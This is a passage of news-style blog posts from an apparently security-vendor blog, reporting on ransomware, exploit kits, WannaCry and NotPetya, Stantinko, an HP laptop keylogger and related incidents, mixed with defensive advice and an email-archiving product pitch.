For the most part, malware and ransomware attacks on law firms are entirely preventable. Simply adopting standard cybersecurity best practices for law firms will prevent the majority of attacks.
One recent ransomware attack on a Providence law firm resulted in a ransom payment of $25,000 being made to the attackers to regain access to the firm’s data. The incident is also a good example of how damaging those attacks can be. Even though payment was made, the law firm lost access to its files for three months, essentially preventing the firm from conducting any business. Lost billings alone cost the firm around $700,000.
Malware and ransomware attacks on law firms are common, although they are underreported for obvious reasons. One incident that was covered in the press was the malware attack on DLA Piper. The attack involved NotPetya, the wiper malware that caused chaos for many organizations around the globe in June. DLA Piper lost access to its data causing huge losses. Losses that are likely to be in the millions.
Part of the problem, especially for smaller law firms, is the high cost of cybersecurity protections. Many law firms simply do not have the budget to cover the cost. They cannot afford to hire skilled cybersecurity professionals to protect their computers and networks, scan for security vulnerabilities and patch and update software. However, the good news is that adopting standard cybersecurity best practices for law firms does not cost big bucks, but it will help firms improve their security posture.
The DLA Piper cyberattack shows that it is not only small law firms that are not following cybersecurity best practices for law firms. Microsoft issued a patch to fix the vulnerability that was exploited by both WannaCry and NotPetya more than two months before the attacks occurred. If the firm had patched promptly, the attack would have been prevented.
Protecting against all cyberattacks is not straightforward, especially with the number of connected devices now used by law firms. However, by adopting the cybersecurity best practices for law firms below and it is possible to reduce risk to an acceptable level.
Cybersecurity Best Practices for Law Firms
Adopting these cybersecurity best practices for law firms will make it harder for hackers to break through defenses and for simple errors to result in costly data breaches.
- Conduct weekly checks of all software to ensure the latest versions are installed and check for patches and apply them promptly
- Ensure that ALL sensitive data is backed up using the 3-2-1 approach. 3 copies of data, on two types of media, with one copy stored securely off site
- Ensure all staff undergo security awareness training covering phishing, social engineering and other threats
- Develop a password policy that requires the use of strong passwords. Enforce password changes regularly
- Consider encryption for all sensitive data
- Use two-factor authentication
- Use an advanced spam filtering solution to reduce spam and block malicious messages
- Employ a next-generation firewall
- Ensure all computers are running supported operating systems and are set to update automatically
- Implement a web filtering solution to block access to all sites known to host malware and exploit kits and to block links to phishing websites
- Develop a data breach response plan – When a breach occurs, fast action can greatly reduce the damage caused
- Engage the services of a third-party security firm to conduct risk analyses to identify vulnerabilities and perform penetration tests
- Consider outsourcing cybersecurity to a managed service provider that will ensure systems, software and security are effectively managed and all vulnerabilities are addressed
- Consider cybersecurity insurance – Only 23% of law firms have purchased cybersecurity insurance according to Logicforce.
A new mobile malware threat has been discovered – Invisible Man Malware – that is being installed via fake software updates. Invisible Man malware is a keylogger that has been designed to obtain banking credentials. While the malware is not new – it has been around for four years – it is frequently updated, with a new variant discovered that takes advantage of the accessibility services on Android devices.
As the name suggests, Invisible Man malware runs silently on infected devices unbeknown to the user. The malware is an overlay that sits atop of legitimate banking apps and intercepts inputs as they are entered on the device. It also allows the attackers behind the malware to intercept text messages, in particular, those used for two-factor authentication and codes sent by banks to authorize transactions.
Once installed on a device it has administrator rights to all Android accessibility services, is installed as the default SMS app and has rights to send and receive SMS messages, make calls, and access contacts on the phone. It can also take screenshots and prevents itself from being uninstalled, according to Kaspersky Lab.
Invisible Man malware has been developed for attacks in Australia, France, Germany, Poland, Singapore, Turkey and the UK, working as a keylogger over 63 banking apps. All data collected is immediately transferred to its C2 server.
Kaspersky Lab reports that Invisible Man malware is primarily being installed on devices using fake software updates, specifically fake Flash Player updates on malicious websites via a downloaded apk file.
Beware of Fake Software Updates
The latest attacks highlight an important point. If you receive a warning on screen telling you that your software is out of date, don’t click and download the update. In this case, the user will be asked to confirm installation, and will be required to provide this app with administrator rights to accessibility services.
Fake software updates are one of the most common methods used to distribute malware, bloatware, adware, ransomware and other nasties.
Given the frequency of software updates now being released to address recently found vulnerabilities, your software may actually be out of date. However, you should visit the vendor’s website and perform a check to see if you have the latest version installed. If not, download the update directly from the vendors website.
Fake software updates are usually offered via popups – Windows that appear when you access a website. They commonly feature flashing Gifs and stern warnings of the risks of not updating your software immediately. Warnings that your computer has already been infected with malware are also common.
Warnings do not only appear when surfing the Internet, spammers use the same tactics via email. The emails often contain the correct logos, color schemes and branding as the legitimate software vendor and look highly realistic.
However, you should not trust any email asking for you to download an executable, part with login credentials or provide other sensitive information, even if it is sent from someone you know.
A new study has shown that cybercriminals have generated ransomware profits in excess of $25 million over the past two years, clearly demonstrating why cryptoransomware attacks have soared. There is big money to be made in this form of cyber extortion. The bad news is that with so many organizations paying to recover their files, the ransomware attacks will continue and will likely increase.
Ransomware attacks are profitable because users are still failing to back up their data. Google’s figures suggest that even though the threat of data deletion or encryption is high, only 37% of computer users back up their data. That means if ransomware encrypts files, the only option to recover data is to pay the ransom demand.
Figures from the FBI estimated ransomware payments to have exceeded $1 billion in 2016; however, it is difficult to accurately calculate ransomware profits since the authors go to great lengths to hide their activities. Ransomware profits are difficult to track and companies are reluctant to announce attacks and whether payment has been made.
Two notable exceptions were the South Korean hosting company Nayana that was attacked and had 153 Linux servers and 3,400 customer websites encrypted. The firm paid 1.2 billion Won – approximately $1 million – for the keys to unlock the encryption. Recently, a Canadian company has reportedly paid a ransom of $425,000 to recover its files, although the identity of the firm is still unknown.
Now, a study conducted by Google, with assistance from Chainalysis, the University of California at San Diego, and New York University’s Tandon School of Engineering has shed some light on actual ransomware profits. The study involved an analysis using blockchains and Bitcoin wallets known to have been used to collect ransomware payments. The researchers also used reports from victims and monitored network traffic generated by victims of ransomware attacks to help track where payments were sent.
The study looked at the top 34 ransomware strains and determined more than $25 million has been collected in the past two years. 95% of payments were cashed out using the Bitcoin trading platform BTC-e.
Google has calculated Locky has earned $7.8 million in ransom payments over the past 24 months – 28% of the total payments made. Cerber is in second place with $6.9 million, followed by CryptoLocker on $2 million and CryptXXX and Sam Sam, both on $1.9 million. Spora ransomware may not have made it into the top five, although Google researchers warn that this is an up-and-coming ransomware variant and one to watch over the coming months.
In recent months Cerber ransomware has become the most widely used ransomware variant. The success of Cerber ransomware can be attributed to the skill of the developers in developing a ransomware variant that can evade detection and the affiliate model used to distribute the ransomware – Ransomware-as-a-Service (RaaS).
RaaS means any number of individuals can conduct ransomware campaigns. Kits are offered to anyone willing to conduct campaigns. Little technical skill is required. All that is required is a lack of moral fiber and the ability to send spam emails distributing the ransomware. Affiliates receive a percentage of the ransomware profits.
WannaCry ransomware certainly caused something of a storm when the worldwide attacks were conducted in May, and while there were more than 200,000 victims worldwide and some 300,000 computers affected, a flaw in the design meant the attacks could be halted and relatively few ransom payments were made. The ransomware profits from these attacks was calculated by Google to be around $100,000.
Ransomware profits from NotPetya were low, although making money was never the aim. NotPetya appeared to be ransomware, although it was actually a wiper. A ransomware demand was issued, but it was not possible to recover data on infected machines. Once this became clear, ransoms were not paid.
The success of Locky, Cerber and CryptXXX is due to the skill of the developers at evading detection. These ransomware variants are constantly evolving to stay one step ahead of security researchers. In the case of Cerber, the researchers discovered thousands of new binaries are being detected each month. There are 23,000 binaries for Cerber and around 6,000 for Locky. In total, the study involved an analysis of 301,588 binaries. The malware variants are capable of changing binaries automatically making detection difficult.
Ransomware attacks may still only make up a small percentage of the total number of malware-related incidents – less than 1% – but the threat is still severe and the attacks are likely to continue, if not increase. As long as it is profitable to develop ransomware and/or use existing ransomware variants, the attacks will continue.
Kylie McRoberts, a senior strategist with Google’s Safe Browsing team, said “Ransomware is here to stay and we will have to deal with for a long time to come.”
It has been a long time coming, and we are not quite there yet, but Adobe Flash is about to die. The long, slow drawn out death of Adobe Flash will continue for another three years yet, with Adobe finally confirming that it will be pulling the plug by December 31, 2020. By then, all updates for Adobe Flash will stop and the we will all enter a Flash free age.
Until then, Adobe is committed to working with partners to ensure Flash remains as secure as possible and updates will continue until that time. However, Adobe is already trying to encourage businesses to start switching to other standards such as HTML5.
The decision to finally put Flash out of its misery was made because other platforms and technology have “matured enough and are capable enough to provide viable alternatives to the Flash player,” according to Adobe.
In 2005, Flash was on 98% of all computers, and even three years ago it was being used by 80% of desktop users on a daily basis. Today, helped in no short part but the serious security flaws in the platform and the switch to mobile devices from PCs, usage has fallen to just 14%.
Google is not supporting Flash anymore and has not done so for Android since 2012. Apple has never supported the plug-in on its mobile devices and Firefox, Chrome, Edge and Safari no longer run Flash content automatically. Even Internet Explorer will disable Flash by default in 2019, ahead of its official death date the following year.
Of course, just stopping updates does not mean that Flash will cease to exist. But given the rate that vulnerabilities in Flash are now being discovered, anyone still using Flash by 2020 will be wide open to attack as soon as the updates stop. However, by then there will be far fewer websites using Flash and fewer devices with the Flash plug-in installed.
The Internet will most likely be a safer place without Flash, but what will happen to all the hackers who are currently developing exploits for Flash vulnerabilities? They will not also decide to retire. Instead they will put their efforts into something else. What that is of course remains to be seen.
Three years may seem like an awfully long time, but there are still many businesses that continue to use Flash and have yet to migrate to other standards. Flash is still extensively used by educational institutions for training programs, while web-based gaming websites will also need time to transition.
Govind Balakrishnan, Adobe’s vice president of product development, pointed out the importance of Flash saying, “Few technologies have had such a profound and positive impact in the Internet era.” That is certainly true, but all good things must come to an end and few will be sorry to see Flash finally die. The end came long ago, but at least now there is an official date when the final nail will be hammered into the coffin.
Stantinko malware may only have recently been detected, but it is far from a new malware variant. It has been in use for the past five years, yet has only recently been identified. During the past five years, Stantinko malware has spread to more than 500,000 devices and has been operating silently, adding infected systems to a large botnet, with the majority of infected machines in Russia and Ukraine.
The botnet has primarily been used to run a largescale adware operation. The malware installs the browser extensions Teddy Protection and The Safe Surfing, which appear to users to be legitimate apps that block malicious URLs. These apps are legitimate if downloaded via the Chrome Web Store, but they are not if they are installed by Stantinko. The Stantinko versions contain different code that is used for click fraud and ad injection.
ESET reports that additional plugins known to be installed by Stantinko malware include Brute-Force and Search Parser which are used for Joomla/WordPress brute force attacks and to anonlymously search for Joomla/WordPress sites. Remote Administrator is a fully functional back door and Facebook Bot can generate fake likes, create new accounts, or add friends on Facebook, virtually undetected.
While click fraud is the primary goal of the attackers, Stantinko malware can perform a wide range of functions. Since Stantinko includes a loader, enabling threat actors to send any code to an infected device via their C2 server and run the code.
ESET researchers say the malware uses Windows services to perform backdoor activities and brute force attacks on WordPress and Joomla websites. Once access is gained, the attackers sell on the login credentials to other cybercriminal groups, according to ESET. That’s not all. ESET says Stantinko malware could be used to perform any task on an infected host.
The malware and botnet have remained undetected for so long due to their ability to adapt to avoid being detected by anti-malware solutions. The malware also uses code encryption to avoid detection. Users would be unlikely to realize that anything untoward was happening on their machine. The tasks performed by the malware involve low CPU activity and do not slow an infected device considerably.
Infection is believed to occur through illegal file sharing, especially the downloading of pirated software. However, ESET notes that infection has occurred through fake torrent files that are actually executables.
Removal of the malware is not straightforward. The malware installs two Windows services, each of which is capable of reinstalling the other service if one is deleted. If for any reason that process fails, the attackers can reinstall those services via their C2 server.
The discovery of Stantinko malware highlights the danger of failing to prevent employees from accessing file sharing websites at work. The downloading of pirated material, even accessing torrents files, has potential to infect enterprise networks with malware. Even if anti-virus and anti-malware solutions have been deployed, there is no guarantee that malware will be detected.
Organizations can protect against these types of attacks by implementing a web filtering solution and blocking access to file sharing websites and torrents sites. If these sites cannot be accessed and pirated software downloads are blocked, infection can be prevented.
UK porn filtering controls are expected to be introduced next year to make it harder for minors to access – accidentally or deliberately – pornographic material over the Internet. The government has proposed a new requirement that will make it mandatory for all sites hosting adult or pornographic content to conduct age verification checks before adult content is displayed.
From April next year, a yet to be decided regulator – most likely the British Board of Film Classification – will be able to block websites hosting pornography if they do not conduct checks to ensure visitors are over the age of 18. Blocks are likely to be applied at the ISP level and the sites could be barred from taking credit card payments from the UK if they do not comply.
The change to UK porn filtering controls would mean minors would be prevented from accessing pornographic material. Digital minister, Matt Hancock, explained the move would mean “UK will have the most robust internet child protection measures of any country in the world.”
While many adult websites ask the user if they are over 18 before content is displayed to prevent accidental access, further controls would be required to verify age. One of the easiest ways to do that is by forcing the visitor to submit their credit card details. In the UK, it is not possible for individuals under the age of 18 to be issued with a credit card.
The new UK porn filtering controls have been welcomed by some groups – the National Society for the Prevention of Cruelty to Children (NSPCC) for example – but the move has raised many concerns.
Age verification checks are likely to result in the operators of the websites maintaining a database of site users, even individuals who do not pay for access. The database is likely not only to include details supplied in the verification checks, but include profiling and viewing histories. It is possible that large volumes of highly sensitive data could be collected on millions of users.
Any website that collects sensitive consumer data is a target for hackers. The databases that could be built by adult content providers would be an even bigger target. Not only could information be used for fraud, the data could be used for blackmail and extortion. One only needs to look back to the Ashley Madison data breach in 2015 to see the damage that can be caused when the databases of adult websites are hacked.
That breach resulted in personal information being exposed along with details of sexual preferences and other highly sensitive information. The fact that a user was registered on a website that is used to hook up for extramarital affairs made even the exposure of personal information even worse. The stolen information was subsequently used by criminals to blackmail users and led to many public shaming incidents. In some cases, exposed users of the site committed suicide as a direct result of the breach.
The Open Rights Group has spoken out about the proposed changes to UK porn filtering controls. Jim Killock, director of the Open Rights Group, said “The Government has repeatedly refused to ensure that there is a legal duty for age verification providers to protect the privacy of web users.” Now, the change “could lead to porn companies building databases of the UK’s porn habits, which could be vulnerable to Ashley Madison style hacks.”
Killock also pointed out, “There is also nothing to ensure a free and fair market for age verification. We are concerned that the porn company MindGeek will become the Facebook of age verification, dominating the UK market.” Were that to happen, the company would be able to decide the level of profiling that takes place, the level of controls it sees fit to introduce to protect data and what privacy risks UK citizens would face.
An enterprise email archiving solution allows emails to be retrieved on demand and ensures messages remain usable. Emails must be produced in the event of an audit and during the legal discovery process. Federal laws require organizations to produce emails, such as when a request is made under the Freedom of Information Act. An email archive is searchable and allows emails to be quickly and easily located and accessed when needed.
Since recovering emails from backups is a long and complicated process, many companies now use an enterprise email archiving solution such as ArcTitan. ArcTitan makes archiving emails a quick and easy process, freeing up valuable storage space on mail servers. Recovering emails is also rapid and straightforward as the archive is searchable. Even large numbers of emails from multiple email accounts can be recovered in minutes. Recovering multiple emails from backups can take several days.
Even though federal laws require emails to be produced on demand, many companies have yet to switch to an email archive and the IRS is not setting a good example. The IRS has recently been discovered to have failed to comply with federal regulations on email storage.
The Treasury Inspector General for Tax Administration (TIGTA) recently conducted an audit of the Inland Revenue Service and discovered that IRS policies on email storage do not allow it to consistently ensure records are retained, and that in several cases, the IRS has been unable to produce emails on request.
The audit was requested by the Chairman of the Senate Committee on Finance and the Chairman of the House Committee on Ways and Means after the IRS reported that it was unable to produce some documents after receiving Freedom of Information requests. After searching for the documents, the IRS discovered documents had been accidentally deleted.
The auditors determined that emails are not automatically archived for all employees and some employees had been instructed to manually store emails on their hard drives or network drives. As a result, some emails and documents were permanently lost when hard drives were damaged or destroyed.
The audit also showed that even though a new executive e-mail retention policy had been introduced that should have resulted in emails being automatically archived, that failed to happen as some executives did not turn on the automatic archiving feature.
Polices on email archiving were also not applied consistently. The IRS was discovered to have failed to follow its own policies on email archiving in more than half of the 30 Freedom of Information requests assessed by auditors. Had an enterprise email archiving solution been used, all documents and emails would have been recoverable and could have been quickly been located.
TIGTA made five recommendations, including the implementation of an enterprise email archiving solution – which is something that all organizations in the United States should consider. In the event of an audit, Freedom of Information request or lawsuit, all relevant emails can be quickly produced and regulatory fines can be avoided.
An Enterprise Archiving Solution will Help IRS´ Compliance with GDPR
The implementation of an enterprise email archiving solution will also help IRS´ compliance with the EU´s General Data Protection Regulation (GDPR) due to be introduced in May 2018. Under the Regulation, the IRS (and any other US organization maintaining the personal data of EU citizens) have a duty to protect EU citizens´ personal data from loss, theft or unauthorized disclosure.
EU citizens also have the right to request access to personal data held by the IRS and a “right to be forgotten” if the IRS no longer has any lawful basis for retaining the data. TIGTA´s audit of email practices within the IRS could not have been more timely, as – should the IRS be unable to produce an email on request or fail to respond to a data access request within thirty days – the Service could be liable for a fine of up to 4% of global turnover. The IRS collected $3.3 trillion in taxes in 2015.
The NotPetya ransomware attacks on Tuesday this week initially looked like another WannaCry-style attack. They used similar NSA exploits to spread infections, ransoms were demanded and like WannaCry, the attacks rapidly spread around the globe. However, closer inspection of NotPetya ransomware has revealed that all may not be as it first appeared.
The purpose of ransomware is to lock files with powerful encryption to prevent files from being accessed. A ransom demand is then issued. Payment of the ransom will see the keys to unlock the decryption supplied. Organizations get their files back. The attackers get a big payday.
There have been many cases when ransomware has encrypted files, yet the attackers are not capable of supplying the keys. These attacks have tended to be conducted by amateurs or show the authors have been sloppy and failed to check that decryption is possible.
If attackers do not make good on their promise to supply valid keys to unlock the encryption, word will soon spread on social media and security websites that paying the ransom will not enable organizations to recover their files. That means the campaign will likely not be profitable.
Developing a new ransomware variant is not a quick and easy process. It does not make sense for a threat actor to go to all the trouble of developing ransomware, devising a sophisticated multi-vector campaign to spread the ransomware, but then forget about essential elements that make it possible to receive ransom payments. That is, unless the aim of the campaign is not to make money.
In the case of the recent NotPetya ransomware attacks, the actors behind the campaign appear to have made some serious errors if making money was their aim.
First, the ransom demand was only $300 per infected machine, which is well below the current average payment demanded by ransomware gangs.
As for the errors, they were numerous. Petya ransomware, which NotPetya closely resembles, provides the victim with an installation ID. That ID is unique to the victim. It is used to determine who has paid the ransom. In the latest attacks, the IDs consisted entirely of random characters. As Kaspersky Lab explained, that means it is not possible for the attackers to identify the victims that pay up.
Successful ransomware campaigns use a different Bitcoin address for each victim, yet only one Bitcoin account was used by the attackers. The email address used by the attacker was hosted by Posteo. The German firm quickly shut down that account, meaning it was not possible to check who had paid. That would be a serious oversight by the attackers, who surely must have suspected that would occur.
NotPetya ransomware also does not encrypt files. Like Petya, it replaces and encrypts the Master File Table (MFT). However, NotPetya ransomware corrupts the MFT, wiping out the first 24 sector blocks. Petya ransomware did not do that, instead modifications were made that could be reversed. As a result, NotPetya causes permanent damage ensuring recovery is not possible.
These factors suggest that Petya was modified and turned into a wiper to cause permanent damage rather than make money. That would suggest this was a state-sponsored attack designed attack to cause major disruption. Due to the extent to which Ukraine was attacked, that country appears to be the main target. As for who was responsible for the attack… that has yet to be established. However, many people in Ukraine have strong suspicions.
Confidence in cyber response plans doesn’t appear to be lacking according to a new study conducted by Deloitte. However, that does not mean organizations are prepared for cyberattacks when they occur. The survey revealed that while confidence is high and IT professionals believe they are well prepared to deal with attacks, their cyber response plans may not be effective.
The only way to determine whether cyber response plans will function as planned is to conduct regular tests. If plans are not tested, organizations will not be able to determine with any degree of certainty, if their plans will be effective.
As the recent Ponemon Institute Cost of a Data Breach study confirmed, the ability to respond quickly to a data breach can reduce breach resolution costs considerably. For that to happen, a response plan must have been developed prior to the breach being experienced and that plan must be effective.
The Deloitte study revealed that 76% of business executives were confident that in the event of a cyberattack they would be able to respond quickly and implement their cyberattack response policies. Yet, the study also revealed that 82% of respondents had not tested their response plans in the past year. They had also not documented their plans with business stakeholders in the past year.
A lot can change in a year. New software solutions are implemented, configurations change as do personnel. Only regular testing will ensure that plans work and staff know their roles when an attack occurs.
Cyberattack simulations are a useful tool to determine how attack response plans will work in practice. As is often the case, plans look great on paper but often fail when put in place. Running simulations every 6 months will help to ensure that a fast and effective response to a cyberattack is possible. However, the survey showed that only 46% of respondents conduct simulations twice a year or more frequently.
A data breach can have dire consequences for a company. The study showed that many companies are most concerned about disruptions to business processes as a result of a cyberattack, although loss of trust and tarnishing of a brand should be of more concern. When a data breach is experienced, customers often choose to take their business elsewhere resulting in a considerable loss of revenue. A fast and efficient breach response can help restore faith in a brand and reduce the churn rate.
If you want to reduce the impact of a data breach and reduce costs, it is essential for cyber response plans to be developed and tested. With the volume of cyberattacks now occurring, it is highly probable that those plans will need to be implemented. By then it will be too late to determine whether they are effective. That could prove extremely costly.
Hackers have been phishing for domain credentials and using the logins to gain access to websites and create malicious subdomains – a process called domain shadowing – and using those subdomains as gates that redirect users to sites loaded with the RIG exploit kit.
The RIG exploit kit probes for vulnerabilities in web browsers and exploits flaws to download malware. Those malware downloads usually occur silently without the users’ knowledge. All that is required for infection is an out of date browser or plugin and for the victim to be directed to a website hosting the exploit kit. RIG has primarily been used to download banking Trojans and Cerber ransomware. While use of the exploit kit is nowhere near the level of Angler prior to its demise, the Rig exploit kit is now the leading EK used by cybercriminals and activity has increased sharply in recent months.
Cybercriminals have been generating traffic to the malicious subdomains using malvertising campaigns – malicious adverts sneaked onto third party ad networks. Those ads are then syndicated across a wide range of high traffic websites and redirect visitors to the malicious subdomains. Other techniques used to drive traffic to the sites include malicious Chrome popups and iframes inserted into compromised WordPress, Drupal and Joomla! Websites.
Tens of thousands of subdomains have been created on legitimate websites that have been compromised by hackers. Cybercriminals are understood to have been obtaining login credentials to websites using malware.
The subdomains were mostly created on websites hosted by GoDaddy. The domain registrar has been working with RSA Security and independent security researchers to identify the compromised websites and take down the subdomains. In total, around 40,000 subdomains were taken down in May.
While this take down is certainly good news, it is unclear how much of an effect it will have on Rig EK operations as little is known about the RIG infrastructure and the total number of websites that have had malicious subdomains added. However, RSA Security says these takedowns have resulted in “a significant loss of capabilities to RIG operations”. RSA and GoDaddy are working to prevent cybercriminals from using domain shadowing and are monitoring for new subdomains that are created. It is unclear if sites purchased through other domain registrars have been targeted in a similar way.
Domain shadowing is a problem because content filters typically have problems identifying malicious subdomains on a genuine website. Since the subdomains only remain active for around 24 hours before being shut down, cybercriminals can avoid domain blacklisting.
However, content filters can prevent users from visiting known malicious websites and they offer protection against webpages hosting exploit kits. They can also be configured to block the downloading of specific file types.
Organizations care also strongly advised to ensure browsers and plugins are kept up to date, especially Java, Silverlight and Adobe Flash plugins. Malware downloaded by the RIG exploit kit most commonly leverages the CVE-2015-8651 vulnerability, although other common exploits include CVE-2016-0189, CVE-2015-2419, and CVE-2014-6332
The Terror exploit kit is a relative newcomer to the EK scene, yet it is evolving rapidly. Since the demise of Angler, exploit kit activity has waned. However, the threat from new exploit kits such as Terror is growing.
Exploit kits probe for vulnerabilities in browsers or plugins. When an individual is directed to a website hosting an exploit kit, the EK searches for exploitable vulnerabilities. When exploitable vulnerabilities are discovered, the EK silently downloads malware or ransomware.
Exploit kits can be hosted on compromised websites or sites run by the attackers. Cybercriminals use a variety of techniques to get traffic to the sites. Links can be sent via spam email or via instant messaging services and social media sites. Malicious advertisements – termed malvertising – can be hosted on third party ad networks. Those ads are then served in sidebars on any number of legitimate, high traffic websites. Web redirects are also used to divert traffic to malicious sites hosting exploit kits.
If an individual with out of date plugins or older browser version visits such a malicious site, and an exploit has been loaded to the kit for a vulnerability in the browser, a malicious payload can be silently downloaded onto the user’s device.
In recent months, spam email has become the main attack vector used by cybercriminals. However, exploit kit activity appears to be increasing with the Terror exploit kit fast evolving into a significant threat.
The Terror exploit kit used to use a ‘carpet-bombing’ approach, sending a wide range of exploits at the end users system in the hope that one would be effective. Such an approach is not particularly sophisticated.
However, Terror has now been updated and attacks can be tailored based on the user’s browser environment. Exploits that have a high probability of being successful are then delivered. The Terror exploit kit can now determine which exploits to drop based on the victim’s browser version, the plugins that have been installed, or patch level, according to the researchers who discovered the update.
Protecting against exploit kits requires browsers and plugins to be kept 100% up to date and vulnerability free, which can be a challenge for businesses. Additional security solutions on endpoints can help to prevent malware downloads, although many are unable to detect or block fileless malware.
One of the best security solutions to deploy is a web filter capable of scanning the URL to prevent end users from landing on websites that are known to host exploit kits. Web filters can also be configured to block malicious adverts.
By preventing users from visiting known malicious sites, the threat from exploit kits can be significantly reduced.
The version of WannaCry ransomware used in Friday’s attacks has been blocked, although new WannaCry ransomware variants have been detected.
U.S Escapes WannaCry Relatively Unscathed
The total number of computers infected with WannaCry ransomware is now believed to be around 300,000, although the United States escaped relatively unscathed, according to the U.S. Department of Homeland Security (DHS).
While it is still unclear exactly how many U.S. organizations have been affected, fewer than 10 organizations have reported a WannaCry ransomware attack to DHS.
The ransomware attacks have now stopped, although organizations that have experienced an infection that has resulted in files being encrypted must recover those files from a backup, accept data loss, or pay the attackers for the decryption keys.
The attackers have so far made around $81,000 from their ransomware campaign, according to @actual_ransom. With a ransom payment of $300 per infected device, many payments have already been made; however, given the number of devices locked by the ransomware, most victims are not paying the attackers to unlock their files.
WannaCry ransomware encryptions were stopped when a security researcher (Malware Tech) from the UK discovered a kill switch while investigating the worm code. In an apparent effort to avoid running in a sandbox or virtual environment, a check was performed on a nonsense domain. If a connection to that domain was successful, the ransomware would exit. If connection to the unregistered domain failed, the ransomware would proceed and encrypt files. By registering that domain, Malware Tech stopped further encryptions.
WannaCry Victims Appear to Have Been Contacted by the Attackers
In an apparent effort to increase the profits from the campaign, the attackers have generated pop up messages on affected computers saying, “I have already sent decryption keys to many customers who had sent me the correct amounts of bitcoin, and I guarantee the decryptions for such honest customers.” While this message could indicate the attacker has access to infected computers, it is possible that the message was pre-programmed to appear.
Paying ransom demands only encourages attackers to conduct further attacks. Ransom payments can be used by the attackers to fund further ransomware campaigns. There is also no guarantee that the attackers will supply valid keys to unlock data, even if they say they will. The advice from the Federal Bureau of Investigation (FBI) is never to pay a ransom unless it is absolutely necessary.
New WannaCry Ransomware Variants Detected
While the version of WannaCry ransomware used in Friday’s attacks has been stopped, that is not the only version of the ransomware being used. New WannaCry ransomware variants have been identified.
A second version was identified by researcher Matt Suiche. This version also included a kill switch, but used a different domain. Suiche registered that second domain and prevented 10,000 infected machines from having files encrypted.
A third version of Wannacry ransomware was also identified by Kaspersky Lab without the kill switch, although in that case, the ransomware component had been corrupted and infected computers would not have data encrypted.
The WannaCry attacks used the ETERNALBLUE exploit published by Shadow Brokers last month, which takes advantage of a vulnerability in Microsoft Server Message Block 1.0 (SMBv1). The threat from WannaCry may be temporarily over, although WannaCry is not the only threat that uses the ETERNALBLUE exploit and the DoublePulsar backdoor.
Researchers at Proofpoint have identified another threat that similarly uses the exploit to gain access to computers. In this case, the goal is not to encrypt files or even steal data. The attackers install Adylkuzz – a program that hogs computer resources and mines the cryptocurrency Monero.
How to Block the ETERNALBLUE Exploit
Other cybercriminals may also be using the ETERNALBLUE exploit and new WannaCry ransomware variants may be released without the kill switch. To block attacks, organizations should ensure that the MS17-010 patch is applied to plug the vulnerability. Older operating systems (Windows 8, Windows Server 2003, and Windows XP) can also be patched and protected against WannaCry ransomware attacks and other malware that use the ETERNALBLUE exploit. Any organization that has port 445 open should also ensure the port is closed, and if SMB must be used over the Internet, SMB should be used through an internal network via a VPN.
Browsing the Internet can result in malware and spyware downloads, malicious software can arrive via spam email, but a fresh-out-of-the-box laptop computer should be totally malware free. But not always. A pre-installed keylogger on HP laptops has recently been identified by Swedish security firm Modzero.
Potentially unwanted programs can be found on many new devices. Some serve a purpose but pose a security threat. For instance, in 2014, Lenovo laptop computers were shipped with ‘malware’ already installed that made the devices vulnerable to man-in-the-middle attacks. The program was Superfish.
The pre-installed keylogger on HP laptops does not appear to be used for any malicious purposes, although there is considerable potential for the program to be abused. The spyware records all keystrokes on the laptops after a user logs in and stores that information in a local drive. In some situations, the keystrokes will be passed to an API on the laptop.
The keylogger was discovered in an audio driver package – Conexant HD Audio Driver Package 22.214.171.124 and earlier versions. The offending file is MicTray64.exe, located in the C:\windows\system32\ folder.
Each time a user logs in, the program is scheduled to run. The file monitors all keystrokes on the device in order to monitor for special keystrokes. The program was developed by, Conexant, the audio chip manufacturer. The program has been included on HP laptops since December 2015.
While the software itself does not exactly pose a threat, the way the program logs the keystrokes allows the recorded keystrokes to be easily accessed. The log file created by the software is stored in the public folder (C:\users\public\MicTray.log) and can therefore be accessed by anyone.
The file is overwritten each time a user logs in, but any keystrokes recorded during that session could be accessed by anyone with access to the device. Additionally, if the registry key with the filepath is missing or corrupted, the keystrokes will be passed to a local API called OutputDebugString API.
Malware installed on the device could potentially allow the log file to be copied, and along with it, all keystrokes from the session. It would also be possible for keystrokes to be obtained in real-time.
The inclusion of the keylogger on HP laptops was an error according to HP. It was used as a debugging tool and should have been removed in the final version of the product.
HP has responded to the discovery by releasing a patch to fix the issue, which is available from the HP website or via Microsoft Update. All owners of HP laptops purchased since December 2015 should download the patch to mitigate the issue.
Models found to contain the pre-installed spyware include the following 28 models of HP laptops:
- HP EliteBook 820 G3 Notebook PC
- HP EliteBook 828 G3 Notebook PC
- HP EliteBook 840 G3 Notebook PC
- HP EliteBook 848 G3 Notebook PC
- HP EliteBook 850 G3 Notebook PC
- HP ProBook 640 G2 Notebook PC
- HP ProBook 650 G2 Notebook PC
- HP ProBook 645 G2 Notebook PC
- HP ProBook 655 G2 Notebook PC
- HP ProBook 450 G3 Notebook PC
- HP ProBook 430 G3 Notebook PC
- HP ProBook 440 G3 Notebook PC
- HP ProBook 446 G3 Notebook PC
- HP ProBook 470 G3 Notebook PC
- HP ProBook 455 G3 Notebook PC
- HP EliteBook 725 G3 Notebook PC
- HP EliteBook 745 G3 Notebook PC
- HP EliteBook 755 G3 Notebook PC
- HP EliteBook 1030 G1 Notebook PC
- HP ZBook 15u G3 Mobile Workstation
- HP Elite x2 1012 G1 Tablet
- HP Elite x2 1012 G1 with Travel Keyboard
- HP Elite x2 1012 G1 Advanced Keyboard
- HP EliteBook Folio 1040 G3 Notebook PC
- HP ZBook 17 G3 Mobile Workstation
- HP ZBook 15 G3 Mobile Workstation
- HP ZBook Studio G3 Mobile Workstation
- HP EliteBook Folio G1 Notebook PC
Pew Research has recently published the results of a study that set out to test cybersecurity awareness in America and find out more about the risks individuals are unwittingly taking when venturing online.
The study was conducted on 1,055 adult Americans, who were each asked 13 cybersecurity questions of varying difficulty. Questions included what HTTPS means, what two-factor authentication is, what private browsing means and the level of protection offered by insecure WiFi networks using a VPN. The study showed that cybersecurity awareness in America is poor and consumers are potentially taking major risks online.
While all 13 questions should have been answered correctly ‘security aware’ individuals, only 1% were able to answer all questions correctly. A substantial majority of adult Americans that took the questionnaire were only able to answer two of the questions correctly. The median was 5 correct answers out of 13, the mean 5.5, and only 20% of participants were able to answer more than 8 answers correctly.
Three quarters of participants were able to identify the most secure password in a list and 73% of respondents were aware that the use of public WiFi networks carries a major risk and should not be used for sensitive activities such as online banking, even if the WiFi network required the use of a password.
